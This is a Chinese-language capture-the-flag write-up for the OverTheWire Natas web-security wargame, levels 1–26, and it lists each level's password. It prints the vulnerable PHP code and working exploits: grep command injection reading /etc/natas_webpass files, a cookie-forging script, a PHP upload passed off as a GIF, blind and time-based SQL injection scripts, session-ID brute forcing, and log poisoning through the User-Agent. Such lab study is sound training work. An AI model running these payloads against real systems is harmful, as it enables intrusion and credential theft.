注:每一关的账号为natas+x 其中x为关卡数,关卡通关的条件是得到下一关卡的password
建议用 burp suite(方便且强大)
第一关:
You can find the password for the next level on this page,but rightclicking has been blocked!
你可以在这个页面上找到下一个级别的密码,但是右键被阻止了!
右键通常可以查看网页源代码,提示的很明显
F12,查看element,查看content得到
得到:<!--The password for natas2 is TguMNxKo1DSaltujBLuZJnDUlCcUAPII->
第二关:
F12
或者右键查看源码效果一样
有 files/pixel.png 提示,尝试
../../../files/
打开user.txt
得到:natas3:3gqisGdR0pjm6tpkDKdIWO2hSvchLeYH
第三关:
前两关菜鸟方法行不通了
需要了解robots.txt robots.txt_web服务器上存在robot(s).txt-CSDN博客
../../../robots.txt/
../../../s3cr3t/
得到:natas4:QryZXc2e0zahULdHrtHxzyYkj59kUxLQ
第四关:
Access disallowed.You are visiting from "while authorized users should come only from
"http://natas5.natas.labs.overthewire.org/"
不允许访问。您是从“授权用户”访问的应该只来自“http://natas5.natas.labs.overthewire.org/”
需要点 refresh page 抓的包才有referer
右键 发送到 repeater(重放器)将referer的natas4改为natas5
得到:0n35PkggAPm2zbEpOU802c0x0Msn1ToK
第五关:
看抓包,logged=0
修改 logged=1
得到:natas6 0RoJwHdSKWFTYR5WuiAewauSuNaBXned
第六关:
查看 view sourcecode
<?
include "includes/secret.inc";
if(array_key_exists("submit", $_POST)) {
if($secret == $_POST['secret']) {
print "Access granted. The password for natas7 is <censored>";
} else {
print "Wrong secret";
}
}
?>
尝试
../../../includes/secret.inc
FOEIUWGHFEEUHOFUOIU
得到:natas7 is bmg8SvU1LizuWjx3y7xkNERkHxGre0GS
第七关:
?page=/etc/natas_webpass/natas8
得到: natas8 xcoXLmzMkoIP9D7hlgPlh9XD7OgLAe5Q
第八关:
<?
$encodedSecret = "3d3d516343746d4d6d6c315669563362";
function encodeSecret($secret) {
return bin2hex(strrev(base64_encode($secret)));
}
if(array_key_exists("submit", $_POST)) {
if(encodeSecret($_POST['secret']) == $encodedSecret) {
print "Access granted. The password for natas9 is <censored>";
} else {
print "Wrong secret";
}
}
?>
import base64
secret="3d3d516343746d4d6d6c315669563362"
a=bytes.fromhex(secret)
reversed_str=a[::-1]
m=base64.b64decode(reversed_str)
print(m)
得到:natas9 is ZE1ck82lmdGIoErlhQgWND6j2Wzz6b6t
第九关:
<?
$key = "";
if(array_key_exists("needle", $_REQUEST)) {
$key = $_REQUEST["needle"];
}
if($key != "") {
passthru("grep -i $key dictionary.txt");
}
?>
. /etc/natas_webpass/natas10 #
得到:natas10 t7I5VHvpa14sJTUGV0cbEsbYfFP2dmOu
第十关:
<?
$key = "";
if(array_key_exists("needle", $_REQUEST)) {
$key = $_REQUEST["needle"];
}
if($key != "") {
if(preg_match('/[;|&]/',$key)) {
print "Input contains an illegal character!";
} else {
passthru("grep -i $key dictionary.txt");
}
}
?>
得到:natas11 UJdqkK1pTu6VLt9UHWAgRZz6sVUZ3lEk
第十一关:
<?
$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");
function xor_encrypt($in) {
$key = '<censored>';
$text = $in;
$outText = '';
// Iterate through each character
for($i=0;$i<strlen($text);$i++) {
$outText .= $text[$i] ^ $key[$i % strlen($key)];
}
return $outText;
}
function loadData($def) {
global $_COOKIE;
$mydata = $def;
if(array_key_exists("data", $_COOKIE)) {
$tempdata = json_decode(xor_encrypt(base64_decode($_COOKIE["data"])), true);
if(is_array($tempdata) && array_key_exists("showpassword", $tempdata) && array_key_exists("bgcolor", $tempdata)) {
if (preg_match('/^#(?:[a-f\d]{6})$/i', $tempdata['bgcolor'])) {
$mydata['showpassword'] = $tempdata['showpassword'];
$mydata['bgcolor'] = $tempdata['bgcolor'];
}
}
}
return $mydata;
}
function saveData($d) {
setcookie("data", base64_encode(xor_encrypt(json_encode($d))));
}
$data = loadData($defaultdata);
if(array_key_exists("bgcolor",$_REQUEST)) {
if (preg_match('/^#(?:[a-f\d]{6})$/i', $_REQUEST['bgcolor'])) {
$data['bgcolor'] = $_REQUEST['bgcolor'];
}
}
saveData($data);
?>
import base64
import json
from urllib.parse import unquote, quote
# 原始Cookie数据
original_cookie = "HmYkBwozJw4WNyAAFyB1VUcqOE1JZjUIBis7ABdmbU1GIjEJAyIxTRg%3D"
# 步骤1:解码Cookie
decoded_cookie = unquote(original_cookie) # URL解码
ciphertext = base64.b64decode(decoded_cookie) # Base64解码
# 步骤2:生成已知明文
default_data = {"showpassword": "no", "bgcolor": "#ffffff"}
plaintext = json.dumps(default_data, separators=(",", ":")).encode() # 紧凑JSON格式
# 步骤3:计算XOR密钥流
key_stream = bytes([p ^ c for p, c in zip(plaintext, ciphertext)])
# 步骤4:自动检测重复密钥
def find_repeating_key(stream, max_len=20):
for n in range(1, max_len+1):
if all(stream[i] == stream[i % n] for i in range(len(stream))):
return stream[:n]
return None
key = find_repeating_key(key_stream)
print(f"[+] 破解密钥: {key.decode(errors='ignore')}")
# 步骤5:构造新数据并加密
new_data = {"showpassword": "yes", "bgcolor": "#ffffff"}
new_json = json.dumps(new_data, separators=(",", ":")).encode()
new_cipher = bytes([b ^ key[i % len(key)] for i, b in enumerate(new_json)])
# 步骤6:生成新Cookie
new_cookie = base64.b64encode(new_cipher).decode()
final_cookie = quote(new_cookie) # URL编码特殊字符
print(f"[+] 新Cookie值: {final_cookie}")
# 使用此Cookie访问页面即可显示密码
[+] 破解密钥: eDWo
[+] 新Cookie值: HmYkBwozJw4WNyAAFyB1VUc9MhxHaHUNAic4Awo2dVVHZzEJAyIxCUc5
得到:The password for natas12 is yZdkjAYZRd3R7tq7T5kXMjMJlOIkzDeB
第十二关:
<?php
function genRandomString() {
$length = 10;
$characters = "0123456789abcdefghijklmnopqrstuvwxyz";
$string = "";
for ($p = 0; $p < $length; $p++) {
$string .= $characters[mt_rand(0, strlen($characters)-1)];
}
return $string;
}
function makeRandomPath($dir, $ext) {
do {
$path = $dir."/".genRandomString().".".$ext;
} while(file_exists($path));
return $path;
}
function makeRandomPathFromFilename($dir, $fn) {
$ext = pathinfo($fn, PATHINFO_EXTENSION);
return makeRandomPath($dir, $ext);
}
if(array_key_exists("filename", $_POST)) {
$target_path = makeRandomPathFromFilename("upload", $_POST["filename"]);
if(filesize($_FILES['uploadedfile']['tmp_name']) > 1000) {
echo "File is too big";
} else {
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
echo "The file <a href=\"$target_path\">$target_path</a> has been uploaded";
} else{
echo "There was an error uploading the file, please try again!";
}
}
} else {
?>
得到:trbs5pCjCrkuSknBBKHhaBxq6Wm1j3LC
第十三关:
<?php
function genRandomString() {
$length = 10;
$characters = "0123456789abcdefghijklmnopqrstuvwxyz";
$string = "";
for ($p = 0; $p < $length; $p++) {
$string .= $characters[mt_rand(0, strlen($characters)-1)];
}
return $string;
}
function makeRandomPath($dir, $ext) {
do {
$path = $dir."/".genRandomString().".".$ext;
} while(file_exists($path));
return $path;
}
function makeRandomPathFromFilename($dir, $fn) {
$ext = pathinfo($fn, PATHINFO_EXTENSION);
return makeRandomPath($dir, $ext);
}
if(array_key_exists("filename", $_POST)) {
$target_path = makeRandomPathFromFilename("upload", $_POST["filename"]);
$err=$_FILES['uploadedfile']['error'];
if($err){
if($err === 2){
echo "The uploaded file exceeds MAX_FILE_SIZE";
} else{
echo "Something went wrong :/";
}
} else if(filesize($_FILES['uploadedfile']['tmp_name']) > 1000) {
echo "File is too big";
} else if (! exif_imagetype($_FILES['uploadedfile']['tmp_name'])) {
echo "File is not an image";
} else {
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
echo "The file <a href=\"$target_path\">$target_path</a> has been uploaded";
} else{
echo "There was an error uploading the file, please try again!";
}
}
} else {
?>
关键:生成的随机名称的.jpg 改为 .php 用GIF89a 骗过文件头校验
得到:GIF89az3UYcr4v4uBpeX8f7EZbMHlzK4UR2XtQ
第十四关:
<?php
if(array_key_exists("username", $_REQUEST)) {
$link = mysqli_connect('localhost', 'natas14', '<censored>');
mysqli_select_db($link, 'natas14');
$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";
if(array_key_exists("debug", $_GET)) {
echo "Executing query: $query<br>";
}
if(mysqli_num_rows(mysqli_query($link, $query)) > 0) {
echo "Successful login! The password for natas15 is <censored><br>";
} else {
echo "Access denied!<br>";
}
mysqli_close($link);
} else {
?>
得到:natas15 is SdqIqBsFcz3yotlNYErZSZwblkm0lrvx
第十五关:
<?php
/*
CREATE TABLE `users` (
`username` varchar(64) DEFAULT NULL,
`password` varchar(64) DEFAULT NULL
);
*/
if(array_key_exists("username", $_REQUEST)) {
$link = mysqli_connect('localhost', 'natas15', '<censored>');
mysqli_select_db($link, 'natas15');
$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
if(array_key_exists("debug", $_GET)) {
echo "Executing query: $query<br>";
}
$res = mysqli_query($link, $query);
if($res) {
if(mysqli_num_rows($res) > 0) {
echo "This user exists.<br>";
} else {
echo "This user doesn't exist.<br>";
}
} else {
echo "Error in query.<br>";
}
mysqli_close($link);
} else {
?>
import requests
from requests.auth import HTTPBasicAuth
import time
url = "http://natas15.natas.labs.overthewire.org/index.php"
auth = HTTPBasicAuth("natas15", "SdqIqBsFcz3yotlNYErZSZwblkm0lrvx") # 使用新密码
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
password = ""
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36"}
for i in range(1, 33): # 密码长度为 32
for char in charset:
payload = f'natas16" AND SUBSTRING(password, {i}, 1) = BINARY "{char}" -- '
data = {"username": payload}
try:
response = requests.post(url, auth=auth, data=data, headers=headers, timeout=10)
response.raise_for_status() # 检查 HTTP 错误
if "This user exists" in response.text:
password += char
print(f"[+] 第 {i} 位: {char} → 当前密码: {password}")
break
else:
print(f"[-] 测试位置 {i} 字符 {char} → 无匹配")
except requests.exceptions.RequestException as e:
print(f"[!] 请求失败: {e}")
time.sleep(0.5) # 避免触发速率限制
print(f"[*] 最终密码: {password}")
得到:hPkjKYviLQctEW33QmuXL6eDVfMW4sGo
第十六关:
<?
$key = "";
if(array_key_exists("needle", $_REQUEST)) {
$key = $_REQUEST["needle"];
}
if($key != "") {
if(preg_match('/[;|&`\'"]/',$key)) {
print "Input contains an illegal character!";
} else {
passthru("grep -i \"$key\" dictionary.txt");
}
}
?>
import requests
chars = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
password = ''
target = 'http://natas16.natas.labs.overthewire.org/'
auth = ('natas16', 'hPkjKYviLQctEW33QmuXL6eDVfMW4sGo')
for i in range(32):
for c in chars:
# 构造精准 payload
url = f"{target}?needle=$(grep ^{password + c} /etc/natas_webpass/natas17)African"
r = requests.get(url, auth=auth)
# 关键判断:若 'African' 不在响应中,说明密码字符正确
if 'African' not in r.text:
password += c
print(f'找到第 {i+1} 位: {c} → 当前密码: {password.ljust(32, "*")}')
break
print(f'最终密码: {password}')
得到:EqjHJbo7LFNb8vwhHb9s75hokh5TF0OC
第十七关:
<?php
/*
CREATE TABLE `users` (
`username` varchar(64) DEFAULT NULL,
`password` varchar(64) DEFAULT NULL
);
*/
if(array_key_exists("username", $_REQUEST)) {
$link = mysqli_connect('localhost', 'natas17', '<censored>');
mysqli_select_db($link, 'natas17');
$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
if(array_key_exists("debug", $_GET)) {
echo "Executing query: $query<br>";
}
$res = mysqli_query($link, $query);
if($res) {
if(mysqli_num_rows($res) > 0) {
//echo "This user exists.<br>";
} else {
//echo "This user doesn't exist.<br>";
}
} else {
//echo "Error in query.<br>";
}
mysqli_close($link);
} else {
?>
import requests
url = 'http://natas17.natas.labs.overthewire.org/index.php'
username= 'natas17'
password= 'EqjHJbo7LFNb8vwhHb9s75hokh5TF0OC'
key = ""
for pos in range(1, 33): # 32 位密码
low = 48 # 这里采用 ascii 码来查找,最小的 ascii 为48
high = 122 # 最大的 ascii 为48
mid = (high+low)>>1 # 折半查找
while mid<high:
# 每次取 password 字段中的一位密码,最后用 "" like " 来闭合 sql 语句
payload= "natas18\" and if(%d < ascii(mid(password,%d,1)), sleep(2), 1) and \"\" like \"" % (mid, pos)
try:
req = requests.post(url, auth = requests.auth.HTTPBasicAuth(username,password),data={"username":payload}, timeout=2)
except requests.exceptions.Timeout:
low = mid + 1
mid = (high+low)>>1
continue
high=mid
mid = (high+low)>>1
key+=chr(mid)
print(key)
得到:6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ
第十八关:
<?php
$maxid = 640; // 640 should be enough for everyone
function isValidAdminLogin() { /* {{{ */
if($_REQUEST["username"] == "admin") {
/* This method of authentication appears to be unsafe and has been disabled for now. */
//return 1;
}
return 0;
}
/* }}} */
function isValidID($id) { /* {{{ */
return is_numeric($id);
}
/* }}} */
function createID($user) { /* {{{ */
global $maxid;
return rand(1, $maxid);
}
/* }}} */
function debug($msg) { /* {{{ */
if(array_key_exists("debug", $_GET)) {
print "DEBUG: $msg<br>";
}
}
/* }}} */
function my_session_start() { /* {{{ */
if(array_key_exists("PHPSESSID", $_COOKIE) and isValidID($_COOKIE["PHPSESSID"])) {
if(!session_start()) {
debug("Session start failed");
return false;
} else {
debug("Session start ok");
if(!array_key_exists("admin", $_SESSION)) {
debug("Session was old: admin flag set");
$_SESSION["admin"] = 0; // backwards compatible, secure
}
return true;
}
}
return false;
}
/* }}} */
function print_credentials() { /* {{{ */
if($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1) {
print "You are an admin. The credentials for the next level are:<br>";
print "<pre>Username: natas19\n";
print "Password: <censored></pre>";
} else {
print "You are logged in as a regular user. Login as an admin to retrieve credentials for natas19.";
}
}
/* }}} */
$showform = true;
if(my_session_start()) {
print_credentials();
$showform = false;
} else {
if(array_key_exists("username", $_REQUEST) && array_key_exists("password", $_REQUEST)) {
session_id(createID($_REQUEST["username"]));
session_start();
$_SESSION["admin"] = isValidAdminLogin();
debug("New session started");
$showform = false;
print_credentials();
}
}
if($showform) {
?>
import requests
url = 'http://natas18.natas.labs.overthewire.org/'
auth = ('natas18', '6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ')
for session_id in range(1, 641):
cookies = {'PHPSESSID': str(session_id)}
try:
response = requests.get(url, auth=auth, cookies=cookies, timeout=5)
if 'You are an admin' in response.text:
print(f"[+] 成功找到有效会话ID: {session_id}")
print("[+] 密码信息如下:")
print(response.text.split('<pre>')[1].split('</pre>')[0])
break
else:
print(f"[-] 尝试会话ID {session_id}:非管理员")
except Exception as e:
print(f"[!] 会话ID {session_id} 请求失败: {e}")
得到:tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr
第十九关:
import binascii
import requests
# proxie = {'http': 'http://127.0.0.1:8080'}
url = 'http://natas19.natas.labs.overthewire.org/'
header = {'Authorization': 'Basic bmF0YXMxOTp0bndFUjdQZGZXa3hzRzRGTldVdG9BWjlWeVpUSnFKcg=='}
for uid in range(91, 641):
payload = str(uid) + '-admin'
suid = str(binascii.b2a_hex(bytes(payload, encoding='utf-8')), encoding='utf8')
cookie = {'__utma': '176859643.1701764875.1629551603.1632719883.1632842691.23',
'__utmz': '176859643.1629551603.1.1.utmcsr=baidu|utmccn=(organic)|utmcmd=organic',
'__utmb': '=176859643.3.10.1632842691',
'__utmc': '176859643',
'__utmt': '1',
'PHPSESSID': suid}
res = requests.get(url, headers=header, cookies=cookie)
if 'You are an admin' in res.text:
print(res.text)
break
else:
print(str(uid) + ' failure')
得到:p5mCvP7GS2K6Bmt3gqhM2Fc1A5T8MVyw
第二十关:
<?php
function debug($msg) { /* {{{ */
if(array_key_exists("debug", $_GET)) {
print "DEBUG: $msg<br>";
}
}
/* }}} */
function print_credentials() { /* {{{ */
if($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1) {
print "You are an admin. The credentials for the next level are:<br>";
print "<pre>Username: natas21\n";
print "Password: <censored></pre>";
} else {
print "You are logged in as a regular user. Login as an admin to retrieve credentials for natas21.";
}
}
/* }}} */
/* we don't need this */
function myopen($path, $name) {
//debug("MYOPEN $path $name");
return true;
}
/* we don't need this */
function myclose() {
//debug("MYCLOSE");
return true;
}
function myread($sid) {
debug("MYREAD $sid");
if(strspn($sid, "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM-") != strlen($sid)) {
debug("Invalid SID");
return "";
}
$filename = session_save_path() . "/" . "mysess_" . $sid;
if(!file_exists($filename)) {
debug("Session file doesn't exist");
return "";
}
debug("Reading from ". $filename);
$data = file_get_contents($filename);
$_SESSION = array();
foreach(explode("\n", $data) as $line) {
debug("Read [$line]");
$parts = explode(" ", $line, 2);
if($parts[0] != "") $_SESSION[$parts[0]] = $parts[1];
}
return session_encode() ?: "";
}
function mywrite($sid, $data) {
// $data contains the serialized version of $_SESSION
// but our encoding is better
debug("MYWRITE $sid $data");
// make sure the sid is alnum only!!
if(strspn($sid, "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM-") != strlen($sid)) {
debug("Invalid SID");
return;
}
$filename = session_save_path() . "/" . "mysess_" . $sid;
$data = "";
debug("Saving in ". $filename);
ksort($_SESSION);
foreach($_SESSION as $key => $value) {
debug("$key => $value");
$data .= "$key $value\n";
}
file_put_contents($filename, $data);
chmod($filename, 0600);
return true;
}
/* we don't need this */
function mydestroy($sid) {
//debug("MYDESTROY $sid");
return true;
}
/* we don't need this */
function mygarbage($t) {
//debug("MYGARBAGE $t");
return true;
}
session_set_save_handler(
"myopen",
"myclose",
"myread",
"mywrite",
"mydestroy",
"mygarbage");
session_start();
if(array_key_exists("name", $_REQUEST)) {
$_SESSION["name"] = $_REQUEST["name"];
debug("Name set to " . $_REQUEST["name"]);
}
print_credentials();
$name = "";
if(array_key_exists("name", $_SESSION)) {
$name = $_SESSION["name"];
}
?>
关键:先发post请求 name注入
name=test%0Aadmin%201
后切换为get请求 (没有name参数)
得到:Username: natas21 Password: BPhv63cKE1lkQl04cE5CuFTzXe15NfiH
第二十一关:
<?php
function print_credentials() { /* {{{ */
if($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1) {
print "You are an admin. The credentials for the next level are:<br>";
print "<pre>Username: natas22\n";
print "Password: <censored></pre>";
} else {
print "You are logged in as a regular user. Login as an admin to retrieve credentials for natas22.";
}
}
/* }}} */
session_start();
print_credentials();
?>
<?php
session_start();
// if update was submitted, store it
if(array_key_exists("submit", $_REQUEST)) {
foreach($_REQUEST as $key => $val) {
$_SESSION[$key] = $val;
}
}
if(array_key_exists("debug", $_GET)) {
print "[DEBUG] Session contents:<br>";
print_r($_SESSION);
}
// only allow these keys
$validkeys = array("align" => "center", "fontsize" => "100%", "bgcolor" => "yellow");
$form = "";
$form .= '<form action="index.php" method="POST">';
foreach($validkeys as $key => $defval) {
$val = $defval;
if(array_key_exists($key, $_SESSION)) {
$val = $_SESSION[$key];
} else {
$_SESSION[$key] = $val;
}
$form .= "$key: <input name='$key' value='$val' /><br>";
}
$form .= '<input type="submit" name="submit" value="Update" />';
$form .= '</form>';
$style = "background-color: ".$_SESSION["bgcolor"]."; text-align: ".$_SESSION["align"]."; font-size: ".$_SESSION["fontsize"].";";
$example = "<div style='$style'>Hello world!</div>";
?>
<p>Example:</p>
<?=$example?>
<p>
关键:a(原页面)的cookie给b(新页面)用burp suite时建议新开窗口
b 注入debug 和 admin=1 需要点update 抓包才能有相关参数
得到:Username: natas22 Password: d8rwGBl0Xslg3b76uh3fEbSlnOUBlozz
第二十二关:
<?php
session_start();
if(array_key_exists("revelio", $_GET)) {
// only admins can reveal the password
if(!($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1)) {
header("Location: /");
}
}
?>
得到:Username: natas23 Password: dIUQcI3uSus1JEOSSWRAEXBG8KbR8tRs
第二十三关:
<?php
if(array_key_exists("passwd",$_REQUEST)){
if(strstr($_REQUEST["passwd"],"iloveyou") && ($_REQUEST["passwd"] > 10 )){
echo "<br>The credentials for the next level are:<br>";
echo "<pre>Username: natas24 Password: <censored></pre>";
}
else{
echo "<br>Wrong!<br>";
}
}
// morla / 10111
?>
得到:Username: natas24 Password: MeuqmfJ8DDKuTr5pcvzFKSwlxedZYEWd
第二十四关:
<?php
if(array_key_exists("passwd",$_REQUEST)){
if(!strcmp($_REQUEST["passwd"],"<censored>")){
echo "<br>The credentials for the next level are:<br>";
echo "<pre>Username: natas25 Password: <censored></pre>";
}
else{
echo "<br>Wrong!<br>";
}
}
// morla / 10111
?>
得到:Username: natas25 Password: ckELKUWZUfpOv6uxS6M7lXBpBssJZ4Ws
第二十五关:
<?php
// cheers and <3 to malvina
// - morla
function setLanguage(){
/* language setup */
if(array_key_exists("lang",$_REQUEST))
if(safeinclude("language/" . $_REQUEST["lang"] ))
return 1;
safeinclude("language/en");
}
function safeinclude($filename){
// check for directory traversal
if(strstr($filename,"../")){
logRequest("Directory traversal attempt! fixing request.");
$filename=str_replace("../","",$filename);
}
// dont let ppl steal our passwords
if(strstr($filename,"natas_webpass")){
logRequest("Illegal file access detected! Aborting!");
exit(-1);
}
// add more checks...
if (file_exists($filename)) {
include($filename);
return 1;
}
return 0;
}
function listFiles($path){
$listoffiles=array();
if ($handle = opendir($path))
while (false !== ($file = readdir($handle)))
if ($file != "." && $file != "..")
$listoffiles[]=$file;
closedir($handle);
return $listoffiles;
}
function logRequest($message){
$log="[". date("d.m.Y H::i:s",time()) ."]";
$log=$log . " " . $_SERVER['HTTP_USER_AGENT'];
$log=$log . " \"" . $message ."\"\n";
$fd=fopen("/var/www/natas/natas25/logs/natas25_" . session_id() .".log","a");
fwrite($fd,$log);
fclose($fd);
}
?>
<?php foreach(listFiles("language/") as $f) echo "<option>$f</option>"; ?>
</select>
</form>
</div>
<?php
session_start();
setLanguage();
echo "<h2>$__GREETING</h2>";
echo "<p align=\"justify\">$__MSG";
echo "<div align=\"right\"><h6>$__FOOTER</h6><div>";
?>
关键:get请求注入
?lang=....//....//....//....//....//var/www/natas/natas25/logs/natas25_km9vk0t9rhu3jh3o92do0aghio.log
user agent 注入
<? readfile("/etc/natas_webpass/natas26");?>
仔细核对 注入 不然没结果
得到:natas26 cVXXwxMS3Y26n5UZU89QgpGmWCelaQlE
第二十六关:
<?php
// sry, this is ugly as hell.
// cheers kaliman ;)
// - morla
class Logger{
private $logFile;
private $initMsg;
private $exitMsg;
function __construct($file){
// initialise variables
$this->initMsg="#--session started--#\n";
$this->exitMsg="#--session end--#\n";
$this->logFile = "/tmp/natas26_" . $file . ".log";
// write initial message
$fd=fopen($this->logFile,"a+");
fwrite($fd,$this->initMsg);
fclose($fd);
}
function log($msg){
$fd=fopen($this->logFile,"a+");
fwrite($fd,$msg."\n");
fclose($fd);
}
function __destruct(){
// write exit message
$fd=fopen($this->logFile,"a+");
fwrite($fd,$this->exitMsg);
fclose($fd);
}
}
function showImage($filename){
if(file_exists($filename))
echo "<img src=\"$filename\">";
}
function drawImage($filename){
$img=imagecreatetruecolor(400,300);
drawFromUserdata($img);
imagepng($img,$filename);
imagedestroy($img);
}
function drawFromUserdata($img){
if( array_key_exists("x1", $_GET) && array_key_exists("y1", $_GET) &&
array_key_exists("x2", $_GET) && array_key_exists("y2", $_GET)){
$color=imagecolorallocate($img,0xff,0x12,0x1c);
imageline($img,$_GET["x1"], $_GET["y1"],
$_GET["x2"], $_GET["y2"], $color);
}
if (array_key_exists("drawing", $_COOKIE)){
$drawing=unserialize(base64_decode($_COOKIE["drawing"]));
if($drawing)
foreach($drawing as $object)
if( array_key_exists("x1", $object) &&
array_key_exists("y1", $object) &&
array_key_exists("x2", $object) &&
array_key_exists("y2", $object)){
$color=imagecolorallocate($img,0xff,0x12,0x1c);
imageline($img,$object["x1"],$object["y1"],
$object["x2"] ,$object["y2"] ,$color);
}
}
}
function storeData(){
$new_object=array();
if(array_key_exists("x1", $_GET) && array_key_exists("y1", $_GET) &&
array_key_exists("x2", $_GET) && array_key_exists("y2", $_GET)){
$new_object["x1"]=$_GET["x1"];
$new_object["y1"]=$_GET["y1"];
$new_object["x2"]=$_GET["x2"];
$new_object["y2"]=$_GET["y2"];
}
if (array_key_exists("drawing", $_COOKIE)){
$drawing=unserialize(base64_decode($_COOKIE["drawing"]));
}
else{
// create new array
$drawing=array();
}
$drawing[]=$new_object;
setcookie("drawing",base64_encode(serialize($drawing)));
}
?>
<?php
session_start();
if (array_key_exists("drawing", $_COOKIE) ||
( array_key_exists("x1", $_GET) && array_key_exists("y1", $_GET) &&
array_key_exists("x2", $_GET) && array_key_exists("y2", $_GET))){
$imgfile="img/natas26_" . session_id() .".png";
drawImage($imgfile);
showImage($imgfile);
storeData();
}
?>
---------------------------为什么没有后面关卡,是php反序列化害了他------------------------------------------
攻略证明:
natas3:3gqisGdR0pjm6tpkDKdIWO2hSvchLeYH
natas4:QryZXc2e0zahULdHrtHxzyYkj59kUxLQ
natas5 is 0n35PkggAPm2zbEpOU802c0x0Msn1ToK
natas6 is 0RoJwHdSKWFTYR5WuiAewauSuNaBXned
$secret = "FOEIUWGHFEEUHOFUOIU"
natas7 is bmg8SvU1LizuWjx3y7xkNERkHxGre0GS
natas8 xcoXLmzMkoIP9D7hlgPlh9XD7OgLAe5Q
natas9 is ZE1ck82lmdGIoErlhQgWND6j2Wzz6b6t
natas10 t7I5VHvpa14sJTUGV0cbEsbYfFP2dmOu
natas11 UJdqkK1pTu6VLt9UHWAgRZz6sVUZ3lEk
The password for natas12 is yZdkjAYZRd3R7tq7T5kXMjMJlOIkzDeB
natas13 trbs5pCjCrkuSknBBKHhaBxq6Wm1j3LC
natas14 GIF89a z3UYcr4v4uBpeX8f7EZbMHlzK4UR2XtQ
natas15 is SdqIqBsFcz3yotlNYErZSZwblkm0lrvx
natas16 hPkjKYviLQctEW33QmuXL6eDVfMW4sGo
natas17 EqjHJbo7LFNb8vwhHb9s75hokh5TF0OC
natas18 6OG1PbKdVjyBlpxgD4DDbRG6ZLlCGgCJ
Username: natas19 Password: tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr
natas20 Password: p5mCvP7GS2K6Bmt3gqhM2Fc1A5T8MVyw
Username: natas21 Password: BPhv63cKE1lkQl04cE5CuFTzXe15NfiH
Username: natas22 Password: d8rwGBl0Xslg3b76uh3fEbSlnOUBlozz
Username: natas23 Password: dIUQcI3uSus1JEOSSWRAEXBG8KbR8tRs
Username: natas24 Password: MeuqmfJ8DDKuTr5pcvzFKSwlxedZYEWd
Username: natas25 Password: ckELKUWZUfpOv6uxS6M7lXBpBssJZ4Ws
natas26 cVXXwxMS3Y26n5UZU89QgpGmWCelaQlE